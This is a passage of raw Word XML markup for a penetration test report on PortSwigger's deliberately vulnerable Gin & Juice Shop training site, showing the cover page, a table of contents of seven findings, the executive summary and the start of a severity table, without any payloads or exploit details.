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9CDB2" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
      <w:pPr>
        <w:spacing w:before="1800"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2944FFF4" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>PENETRATION TEST REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571C08C2" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:before="200" w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="374151"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Gin &amp; Juice Shop — Web Application Security Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6988E180" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="12" w:space="10" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="433FE256" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00514271">
      <w:pPr>
        <w:spacing w:before="800"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="3500" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2470"/>
        <w:gridCol w:w="4586"/>
      </w:tblGrid>
      <w:tr w:rsidR="00514271" w14:paraId="2FAA4CC5" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1750" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="04DADA3B" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Target:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3250" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5AF2CCDE" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ginandjuice.shop</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="77F57983" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1750" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="334FFF87" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Engagement Type:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3250" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1F0AAF58" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Black-/Grey-Box Web Application Penetration Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="71B35402" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1750" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1F439FC9" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Report Date:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3250" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0055ABFA" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>July 3, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="73609E1E" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1750" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="07AAC7CB" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Classification:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3250" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3DBF6A5F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CONFIDENTIAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="563B84D7" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1750" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5C9EDC68" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Prepared By:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3250" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="557A7731" w14:textId="1EA7E79B" w:rsidR="00514271" w:rsidRDefault="00A569E6">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Amr</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="56ABAC4C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1750" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4464177A" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Prepared For:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3250" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="200" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4EE58853" w14:textId="6F760E9D" w:rsidR="00514271" w:rsidRDefault="00A569E6">
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>DEPI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12FDB8C7" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA6639D" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="4" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C485627" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1DE106" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>2. Engagement Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4E6844" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>3. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A02BE4F" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>4. Risk Rating Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564BD316" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>5. Summary of Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EDCC88" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>6. Detailed Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECC5991" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   F-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>01  SQL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Injection in catalog search (category parameter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0094F98E" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   F-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>02  No</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Rate Limiting on Login Endpoint (Brute Force)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E366306" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   F-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>03  Reflected</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Cross-Site Scripting — Blog Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3781BDFD" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   F-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>04  Client</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-Side Template Injection (Vulnerable AngularJS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07626C01" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   F-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>05  Reflected</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cross-Site Scripting — Catalog </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>searchTerm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65D614B7" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   F-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>06  Reflected</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Cross-Site Scripting — Login Parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E58CB7" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   F-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>07  Missing</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Security Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61543952" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7727EDC1" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D905B1" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="4" w:color="1F2937"/>
        </w:pBdr>
        <w:spacing w:before="400" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBC2574" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This report presents the findings of a web application penetration test performed aga</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">inst the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ginandjuice.shop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> target, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PortSwigger's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> intentionally vulnerable e-commerce training application. The objective of the engagement was to identify and validate exploitable security weaknesses across authentication, input validation, and HTTP respons</w:t>
      </w:r>
      <w:r>
        <w:t>e configuration, and to provide actionable remediation guidance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F597EE" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>During testing, seven findings were identified spanning Critical to Informational severity. The most significant issue is a SQL Injection vulnerability in the product catalog's category filte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">r, which allowed enumeration of backend database schemas and could be leveraged for full data exfiltration. The assessment also identified an unthrottled login endpoint permitting automated credential brute-forcing, multiple reflected Cross-Site Scripting </w:t>
      </w:r>
      <w:r>
        <w:t>(XSS) vulnerabilities, a Client-Side Template Injection issue tied to an outdated AngularJS library, and a set of missing HTTP security headers that weaken the application's overall defense-in-depth posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D22F32" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The table below summarizes findings by severity.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detailed technical descriptions, proof-of-concept evidence, business impact, and remediation guidance for each issue are provided in Section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6"/>
        <w:gridCol w:w="2574"/>
        <w:gridCol w:w="2574"/>
      </w:tblGrid>
      <w:tr w:rsidR="00514271" w14:paraId="222FFCAB" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F6971AC" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B3AAB87" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F2937"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34D31DEE" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">% </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>of</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="278E61CC" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7F1D1D"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25FCF15B" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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73C4039A" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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41CB1917" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>14%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00514271" w14:paraId="58F38178" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="CBD5E1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="B91C1C"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C4A8BCE" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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72E21641" w14:textId="77777777" w:rsidR="00514271" w:rsidRDefault="00877F8D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="18"/>
